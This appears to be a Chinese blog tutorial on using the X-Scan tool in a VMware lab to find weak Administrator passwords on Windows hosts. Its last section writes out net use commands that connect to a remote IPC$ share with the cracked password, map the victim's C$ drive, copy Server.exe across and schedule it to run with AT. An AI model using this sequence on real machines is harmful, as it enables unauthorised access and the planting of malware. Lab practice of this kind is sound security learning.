x-scanf基本使用教程

x-scanf基本使用教程

2020-04-07 by 梦兮Q

1、实验准备

0.实验原理

• x-scanf已是好久维护了，最后更新时在2005年，在软件考试界面中做者写的很明白：“理论上可运行于Windows NT系列操做系统，推荐运行于Windows 2000以上的Server版Windows系统。'',可是，我屡次实验证实，在win 7系统上扫描时，体验极差，各类扫描不出来和软件崩溃。
• 屡次实验后，我我的以为在win server 2003 体验是最佳的。
• 还有，我在实验中发现，x-scanf只能扫描出管理员帐户的弱密码（Administrator）。
• 能扫描出弱密码的缘由是，通常的windows系统却是NT server系统（Windows NT Server），为了经过网络方便远程管理和共享等。而，能有最高权限操做的只有Administrator帐户，其余帐户的弱密码扫描不到。（可能也是由于没有加入共享组的缘由吧，我没具体实验过。）
• 软件下载传送门

连接： https://pan.baidu.com/s/1IwT3...
提取码：9yhz
复制这段内容后打开百度网盘手机App，操做更方便哦

1.实验拓步

本实验中使用的VMware15虚拟机。

• 一台windows server 2003当作扫描的服务器，用于运行x-scanf扫描工具。
• 一台win7和一台win xp 模拟被扫描的主机，开启管理员帐户，并设置一个建议的密码：123456，模拟注意设置了不安全的弱密码。
• 将全部虚拟机绑定在同一块虚拟网卡（VMNet10）上，模拟全部主机处于同一局域网。

2.如何将全部虚拟机绑定到同一区域网中？

（1）打开虚拟网络编辑器

（2）建立一个虚拟网络

• VMnet +数字标识，标识了一个虚拟机局域网。
• 选择以后，默认类型是仅主机模式就好了，该模式中你的本地电脑和虚拟机都在同一私有区域网络。

（3）将虚拟机绑定到同一虚拟网络中，这里我给全部虚拟机绑定的是VMnet10。

3.如何开启windows系统管理员帐户?

小技巧：

• window server开机后 ，按Ctrl+Alt+Insert 进入系统就不会锁屏了。

（1）右键个人电脑，选择管理。打开计算机管理。

（2）启用管理员帐户

（3）打开控制面板，按照下面的路径，找到Administrator帐户，并更改密码。

这里我更改的密码为：123456

2、开始扫描系统漏洞

1. 配置扫描参数

打开x-scanf v3.3. GUI.

（1）检测范围

（1）扫描模块

模块功能很丰富，可是本次实验咱们主要扫描NT-Server弱口令。

（3）其余设置（重要）

再虚拟环境中，可能会由于某些缘由，扫描进程会跳过，因此要选择 无条件扫描

2.开始扫描

• 扫描完成后，会自动弹出html版的扫描报告。

3.提取信息

(1)经过实时扫描结果

（2）经过扫描报告获取详细和统计信息。

查看 》 检查报告

能够点击切换报告的查看类型 HTML、TXT、XML。

HTML：就是网页版本

TXT：记事本文档

XML：可扩展标记语言，将白了，通常是web配置文件的类型。

3、使用扫描到弱密码，操控主机

这里使用net 命令行的方式链接

1. 链接对方

   必需以管理员身份打开，进入CMD/Powershell.

   注意空格

   192.168.100.131：对方IP地址

   123456：为密码

   administrator：用户名

   net use \\\\192.168.100.131\\ipc$ "123456" /user:"administrator"

2. 映射对方的磁盘到个人电脑

   net use Y: \\\\192.168.100.131\\C$  
   //这里时将对方的C盘，映射成个人电脑下的Y盘

3. 向对方复制文件。

   若是能够的话，建议使用资源管理器，把文件复制到Y盘就好了

   copy C:\\Server.exe  \\\\192.168.100.131\\C$  
   //复制我C盘下的‘Server.exe’文件到对方电脑的C盘根目录下

4. 让对方电脑自动执行软件。

   就是给对方电脑发送一些工做指令

   AT \\\\192.168.100.131 22:29 c:\\Server.exe  
   //对方电脑在在22:29运行程序C盘根目录下的Server.exe程序。